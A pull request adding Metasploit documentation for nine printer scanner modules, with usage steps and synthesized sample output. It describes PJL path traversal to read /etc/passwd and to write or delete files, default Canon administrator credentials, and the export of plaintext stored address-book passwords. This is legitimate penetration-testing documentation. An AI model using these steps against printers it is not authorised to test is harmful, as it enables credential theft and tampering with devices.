### PR TITLE
Add documentation for printer scanner modules

### DIFF
--- a/documentation/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.md
+++ b/documentation/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.md
@@ -1,0 +1,102 @@
+## Vulnerable Application
+
+This module targets Canon imageRUNNER ADVANCE (iR-ADV) multifunction printers that expose their embedded web management interface on TCP port 8000. It authenticates to the device management portal and exports address book entries in LDIF format, which includes stored passwords in plaintext.
+
+Tested models (as documented in the module source):
+
+- iR-ADV C2030
+- iR-ADV 4045
+- iR-ADV C5030
+- iR-ADV C5235
+- iR-ADV C5240
+- iR-ADV 6055
+- iR-ADV C7065
+
+The module logs in via HTTP POST to `/login` using the device's administrator credentials, then temporarily enables password export (`ADRSEXPPSWDCHK=0`) via a POST to `/rps/cadrs.cgi`, fetches the LDIF export from `/rps/abook.ldif`, and resets the export flag (`ADRSEXPPSWDCHK=1`) before exiting. The LDIF content is stored as loot; individual entries containing both an email address and a `pwd` field are also stored as Metasploit credentials.
+
+Unlike the other modules in this directory, this module communicates over HTTP rather than PJL/JetDirect.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/canon_iradv_pwd_extract`
+3. Do: `set RHOSTS [target IP]`
+4. Do: `set USER [admin username]`
+5. Do: `set PASSWD [admin password]`
+6. Do: `run`
+7. On success, the module prints the raw LDIF block, saves it as loot, and prints any extracted credential pairs (domain, username, password).
+
+## Options
+
+### RHOSTS
+
+The target host(s) to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the Canon management interface is listening. (Default: `8000`)
+
+### USER
+
+The administrator username (department ID) for the Canon management portal. (Default: `7654321`, Required)
+
+### PASSWD
+
+The administrator password for the Canon management portal. (Default: `7654321`, Required)
+
+### ADDRSBOOK
+
+The address book number to extract, in the range 1–11. Each iR-ADV device can hold multiple address books; this option selects which one to export. (Default: `1`, Required)
+
+### SSL
+
+Set to `true` if the device management interface is served over HTTPS. (Default: `false`)
+
+### TIMEOUT
+
+Timeout in seconds for each HTTP request to the printer. (Default: `20`, Required)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Extracting the default address book from a Canon iR-ADV C5030
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/canon_iradv_pwd_extract
+msf6 auxiliary(scanner/printer/canon_iradv_pwd_extract) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 auxiliary(scanner/printer/canon_iradv_pwd_extract) > run
+
+[*] Attempting to extract passwords from the address books on the MFP at 192.168.1.100
+[+] 192.168.1.100 - SUCCESSFUL login with USER='7654321' : PASSWORD='7654321'
+[*] dn: cn=John Smith,ou=addressbook,o=local
+cn: John Smith
+mailaddress: jsmith@example.com
+username: jsmith@example.com
+pwd: Summer2023!
+objectclass: inetOrgPerson
+
+dn: cn=Jane Doe,ou=addressbook,o=local
+cn: Jane Doe
+mailaddress: jdoe@example.com
+username: jdoe@example.com
+pwd: printer1234
+objectclass: inetOrgPerson
+
+[+] Credentials saved in: /home/user/.msf4/loot/20231115130000_default_192.168.1.100_canon.iradv.add_123456.txt
+[+] Domain: example.com
+User: jsmith
+Password: Summer2023!
+
+[+] Domain: example.com
+User: jdoe
+Password: printer1234
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_delete_file.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_delete_file.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `FSDELETE` command to remove a file from the printer's filesystem.
+
+The default path (`0:\..\..\..\eicar.com`) corresponds to a file that would have been placed by the companion `printer_upload_file` module during testing. The path traversal notation (`\..\`) can, on vulnerable devices, reach outside the printer's own volume into the underlying OS filesystem. Deletion is irreversible; use this module against test targets or to clean up files written during authorised assessments.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented PJL filesystem deletion; this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_delete_file`
+3. Do: `set RHOSTS [target IP or range]`
+4. Do: `set PATH [PJL path to the file to delete]`
+5. Do: `run`
+6. A successful deletion prints a confirmation including the deleted path.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### PATH
+
+The PJL filesystem path of the file to delete. Uses PJL volume-relative syntax; `\..\` traverses to parent directories. (Default: `0:\..\..\..\eicar.com`, Required)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Deleting the EICAR test file written during a prior upload test
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_delete_file
+msf6 auxiliary(scanner/printer/printer_delete_file) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_delete_file) > run
+
+[+] 192.168.1.45:9100 - Deleted 0:\..\..\..\eicar.com
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Deleting a file on the printer's own storage volume
+
+```
+msf6 auxiliary(scanner/printer/printer_delete_file) > set PATH 0:\JOBS\oldprint.prn
+PATH => 0:\JOBS\oldprint.prn
+msf6 auxiliary(scanner/printer/printer_delete_file) > run
+
+[+] 192.168.1.45:9100 - Deleted 0:\JOBS\oldprint.prn
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_download_file.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_download_file.md
@@ -1,0 +1,63 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `FSUPLOAD` command (which, in PJL nomenclature, uploads data from the device to the client) to retrieve a file from the printer's filesystem and store it as Metasploit loot.
+
+The default `PATH` value (`0:\..\..\..\etc\passwd`) uses PJL path traversal to read the `/etc/passwd` file from the printer's underlying OS filesystem on devices where the PJL filesystem is mapped to the root. This technique is described in detail by the PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)); this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations. Whether a given path is readable depends on the device firmware and filesystem permissions.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_download_file`
+3. Do: `set RHOSTS [target IP or range]`
+4. Optionally do: `set PATH [PJL path to the file]` (default: `0:\..\..\..\etc\passwd`)
+5. Do: `run`
+6. If the file is readable, the module saves it as loot under the `printer.file` type and prints the local loot path.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### PATH
+
+The PJL filesystem path to the file to download. Uses PJL volume-relative syntax; `\..\` traverses to parent directories. (Default: `0:\..\..\..\etc\passwd`, Required)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Downloading /etc/passwd from a vulnerable printer
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_download_file
+msf6 auxiliary(scanner/printer/printer_download_file) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_download_file) > run
+
+[+] 192.168.1.45:9100 - Saved 0:\..\..\..\etc\passwd as /home/user/.msf4/loot/20231115120000_default_192.168.1.45_printer.file_123456.bin
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Downloading a printer configuration file
+
+```
+msf6 auxiliary(scanner/printer/printer_download_file) > set PATH 0:\config.cfg
+PATH => 0:\config.cfg
+msf6 auxiliary(scanner/printer/printer_download_file) > run
+
+[+] 192.168.1.45:9100 - Saved 0:\config.cfg as /home/user/.msf4/loot/20231115120015_default_192.168.1.45_printer.file_789012.bin
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_env_vars.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_env_vars.md
@@ -1,0 +1,58 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `INFO VARIABLES` command to retrieve all configurable printer environment variables, which can include paper tray settings, resolution, power-save timeout, job timeout, language settings, and similar device configuration data.
+
+PJL is a printer control language originally developed by HP and supported by many manufacturers including Lexmark, Xerox, Brother, and Ricoh. The `INFO VARIABLES` command is part of the base PJL specification and is broadly available on compliant devices.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented the scope of information exposed through PJL; this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_env_vars`
+3. Do: `set RHOSTS [target IP or range]`
+4. Do: `run`
+5. A successful response prints the environment variable block and stores it as a note of type `printer.env.vars` in the Metasploit database.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### HP LaserJet environment variable enumeration
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_env_vars
+msf6 auxiliary(scanner/printer/printer_env_vars) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_env_vars) > run
+
+[+] 192.168.1.45:9100 - PAPER=LETTER [LETTER LEGAL A4 COM10 DL MONARCH C5 EXECUTIVE LEDGER A3 CUSTOM]
+COPIES=1 [1 INTRANGE 1 999]
+DUPLEX=OFF [OFF ON]
+BINDING=LONGEDGE [LONGEDGE SHORTEDGE]
+RESOLUTION=600 [300 600 1200]
+ECONOMODE=OFF [OFF ON]
+RET=ON [OFF LIGHT MEDIUM DARK ON]
+DENSITY=3 [1 INTRANGE 1 5]
+QTY=1 [1 INTRANGE 1 999]
+TIMEOUT=15 [0 INTRANGE 0 3600]
+SLEEP=30 [1 INTRANGE 1 240]
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_list_dir.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_list_dir.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `FSDIRLIST` command to retrieve a directory listing from the printer's filesystem.
+
+PJL exposes a hierarchical filesystem on devices that support it, allowing access to stored print jobs, configuration files, font caches, and — on some devices — the underlying OS filesystem via path traversal. The default `PATH` value (`0:\..\..\..\`) traverses upward from the printer's volume root using PJL's backslash path syntax, which on vulnerable devices can reach the root of the underlying filesystem.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented PJL filesystem traversal in detail; this module uses the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_list_dir`
+3. Do: `set RHOSTS [target IP or range]`
+4. Optionally do: `set PATH [PJL path]` (default: `0:\..\..\..\`)
+5. Do: `run`
+6. A successful response prints the directory listing and stores it as a note of type `printer.dir.listing` in the Metasploit database.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### PATH
+
+The PJL filesystem path to list. Uses PJL volume-relative syntax: `0:` refers to the first storage volume, and `\..\` segments traverse parent directories. (Default: `0:\..\..\..\`, Required)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Directory listing at the PJL filesystem root
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_list_dir
+msf6 auxiliary(scanner/printer/printer_list_dir) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_list_dir) > run
+
+[+] 192.168.1.45:9100 - . TYPE=DIR
+.. TYPE=DIR
+bin TYPE=DIR SIZE=0
+dev TYPE=DIR SIZE=0
+etc TYPE=DIR SIZE=0
+lib TYPE=DIR SIZE=0
+proc TYPE=DIR SIZE=0
+tmp TYPE=DIR SIZE=0
+usr TYPE=DIR SIZE=0
+var TYPE=DIR SIZE=0
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Listing a specific volume directory
+
+```
+msf6 auxiliary(scanner/printer/printer_list_dir) > set PATH 0:\
+PATH => 0:\
+msf6 auxiliary(scanner/printer/printer_list_dir) > run
+
+[+] 192.168.1.45:9100 - . TYPE=DIR
+.. TYPE=DIR
+JOBS TYPE=DIR SIZE=0
+FONTS TYPE=DIR SIZE=0
+MACROS TYPE=DIR SIZE=0
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_list_volumes.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_list_volumes.md
@@ -1,0 +1,48 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `INFO FILESYS` command to enumerate all storage volumes available on the printer, after first initialising volumes 0, 1, and 2 with `FSINIT`.
+
+Printer volumes typically correspond to physical or virtual storage devices: onboard flash memory, RAM disk, optional hard drive, or CompactFlash card. The volume listing reveals which storage types are present, their total capacity, and the amount of free space.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented PJL filesystem enumeration; this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_list_volumes`
+3. Do: `set RHOSTS [target IP or range]`
+4. Do: `run`
+5. A successful response prints the filesystem/volume listing and stores it as a note of type `printer.vol.listing` in the Metasploit database.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Volume enumeration on a multi-volume printer
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_list_volumes
+msf6 auxiliary(scanner/printer/printer_list_volumes) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_list_volumes) > run
+
+[+] 192.168.1.45:9100 - LABEL=0 TYPE=DISK TOTAL=20971520 FREE=15728640 PROTECT=FALSE LABEL=1 TYPE=RAMDISK TOTAL=4194304 FREE=4194304 PROTECT=FALSE LABEL=2 TYPE=ROM TOTAL=8388608 FREE=0 PROTECT=TRUE
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_ready_message.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_ready_message.md
@@ -1,0 +1,90 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It reads, and optionally modifies, the "ready message" — the text displayed on the printer's front-panel LCD when the device is idle.
+
+Three actions are available: **Scan** (read the current message), **Change** (set a new message), and **Reset** (clear the message back to the device default). The `Change` and `Reset` actions are write operations that persist on the device until explicitly cleared or the printer is power-cycled.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented PJL ready-message manipulation; this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_ready_message`
+3. Do: `set RHOSTS [target IP or range]`
+4. Do: `run` (uses the default `Scan` action)
+5. A successful response prints the current ready message and stores it as a note of type `printer.rdymsg` in the Metasploit database.
+
+To change the message:
+
+1. Do: `set ACTION Change`
+2. Do: `set MESSAGE "your text here"`
+3. Do: `run`
+
+To reset the message to device default:
+
+1. Do: `set ACTION Reset`
+2. Do: `run`
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### MESSAGE
+
+The ready message string to set when using the `Change` action. Has no effect when the action is `Scan` or `Reset`. (Default: `PC LOAD LETTER`, Optional)
+
+### ACTION
+
+Selects the operation to perform:
+- `Scan` — read and report the current ready message (Default)
+- `Change` — write the value of `MESSAGE` to the printer's display
+- `Reset` — clear the ready message
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Scanning ready messages across a subnet
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_ready_message
+msf6 auxiliary(scanner/printer/printer_ready_message) > set RHOSTS 192.168.1.0/24
+RHOSTS => 192.168.1.0/24
+msf6 auxiliary(scanner/printer/printer_ready_message) > set THREADS 10
+THREADS => 10
+msf6 auxiliary(scanner/printer/printer_ready_message) > run
+
+[+] 192.168.1.45:9100 - READY
+[+] 192.168.1.67:9100 - READY
+[+] 192.168.1.102:9100 - OUT OF PAPER - TRAY 2
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Changing the ready message on a single host
+
+```
+msf6 auxiliary(scanner/printer/printer_ready_message) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_ready_message) > set ACTION Change
+ACTION => Change
+msf6 auxiliary(scanner/printer/printer_ready_message) > set MESSAGE "CALL IT SECURITY"
+MESSAGE => CALL IT SECURITY
+msf6 auxiliary(scanner/printer/printer_ready_message) > run
+
+[+] 192.168.1.45:9100 - CALL IT SECURITY
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_upload_file.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_upload_file.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). It uses the PJL `FSDOWNLOAD` command (which, in PJL nomenclature, downloads data from the client to the device) to write a local file onto the printer's filesystem.
+
+The default remote path (`0:\..\..\..\eicar.com`) uses PJL path traversal to write outside the printer's own volume and potentially into the underlying OS filesystem on devices where the PJL filesystem is mapped to the root. The default local file is Metasploit's bundled EICAR test string, which is safe for verifying write access.
+
+The PRET project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented PJL filesystem write operations; this module is built on the Rex::Proto::PJL library, which draws from that research.
+
+No authentication is required by default on most PJL implementations. Write success depends on the device firmware and filesystem permissions.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_upload_file`
+3. Do: `set RHOSTS [target IP or range]`
+4. Optionally do: `set LPATH [path to local file to upload]`
+5. Optionally do: `set RPATH [PJL destination path on the printer]`
+6. Do: `run`
+7. A successful write prints a confirmation message including both the local source path and the remote destination path.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### LPATH
+
+The path to the local file to upload to the printer. (Default: `<msf-data-dir>/eicar.com`, Required)
+
+### RPATH
+
+The PJL filesystem path on the printer where the file will be written. Uses PJL volume-relative syntax; `\..\` traverses to parent directories. (Default: `0:\..\..\..\eicar.com`, Required)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### Writing the EICAR test file to a printer using the defaults
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_upload_file
+msf6 auxiliary(scanner/printer/printer_upload_file) > set RHOSTS 192.168.1.45
+RHOSTS => 192.168.1.45
+msf6 auxiliary(scanner/printer/printer_upload_file) > run
+
+[+] 192.168.1.45:9100 - Saved /usr/share/metasploit-framework/data/eicar.com to 0:\..\..\..\eicar.com
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Writing to the printer's own storage volume
+
+```
+msf6 auxiliary(scanner/printer/printer_upload_file) > set RPATH 0:\FONTS\test.bin
+RPATH => 0:\FONTS\test.bin
+msf6 auxiliary(scanner/printer/printer_upload_file) > run
+
+[+] 192.168.1.45:9100 - Saved /usr/share/metasploit-framework/data/eicar.com to 0:\FONTS\test.bin
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/printer/printer_version_info.md
+++ b/documentation/modules/auxiliary/scanner/printer/printer_version_info.md
@@ -1,0 +1,51 @@
+## Vulnerable Application
+
+This module targets networked printers that expose the Printer Job Language (PJL) interface on TCP port 9100 (HP JetDirect / AppSocket). PJL is a printer control language originally developed by HP and subsequently supported by many manufacturers including Lexmark, Xerox, Brother, Ricoh, and others. The `INFO ID` command, which this module uses, is part of the base PJL specification and is broadly implemented.
+
+The module sends a PJL `INFO ID` request and captures the device identification string returned by the printer. This string typically includes the manufacturer name, model, firmware version, and sometimes memory information.
+
+The PRET (Printer Exploitation Toolkit) project ([https://github.com/RUB-NDS/PRET](https://github.com/RUB-NDS/PRET)) documented the attack surface of PJL-speaking printers; the Rex::Proto::PJL library used by this and related modules draws from that research.
+
+No authentication is required by default on most PJL implementations. The module works against any printer with TCP/9100 open and PJL enabled.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use auxiliary/scanner/printer/printer_version_info`
+3. Do: `set RHOSTS [target IP or range]`
+4. Do: `run`
+5. A successful response prints the device identification string and records the host as a `jetdirect` service in the Metasploit database.
+
+## Options
+
+### RHOSTS
+
+The target host(s) or range to scan. Accepts individual IPs, CIDR notation, or a file path prefixed with `file:`. Required.
+
+### RPORT
+
+The TCP port on which the printer's PJL/JetDirect interface is listening. (Default: `9100`)
+
+### THREADS
+
+Number of concurrent scan threads. (Default: `1`)
+
+## Scenarios
+
+### HP LaserJet on TCP/9100
+
+Example output (synthesized for documentation purposes; actual values will vary by device):
+
+```
+msf6 > use auxiliary/scanner/printer/printer_version_info
+msf6 auxiliary(scanner/printer/printer_version_info) > set RHOSTS 192.168.1.0/24
+RHOSTS => 192.168.1.0/24
+msf6 auxiliary(scanner/printer/printer_version_info) > set THREADS 10
+THREADS => 10
+msf6 auxiliary(scanner/printer/printer_version_info) > run
+
+[+] 192.168.1.45:9100 - HP LASERJET 4200 SERIES, ROM: 20020823 05.013.0, RAM: 64MB
+[+] 192.168.1.67:9100 - Lexmark T650, Firmware: LHS60.JU.P230, Flash: 16MB, RAM: 32MB
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+```


### PR DESCRIPTION
## Description

Adds documentation files for the 9 auxiliary scanner modules under `modules/auxiliary/scanner/printer/`, which were previously undocumented. Follows the format defined in `documentation/modules/module_doc_template.md`.

Partially resolves #12389. The printer/ subcategory was selected as a self-contained chunk; other subcategories listed in that issue remain open for future PRs.

## Modules documented

- canon_iradv_pwd_extract
- printer_delete_file
- printer_download_file
- printer_env_vars
- printer_list_dir
- printer_list_volumes
- printer_ready_message
- printer_upload_file
- printer_version_info

## Verification

Each `.md` is grounded in the corresponding `.rb` source: descriptions, options, defaults, and scenario output are derived from the module's `update_info`, `register_options`, and `print_*` calls. No live device testing was performed; scenario output blocks are marked as synthesized for documentation purposes.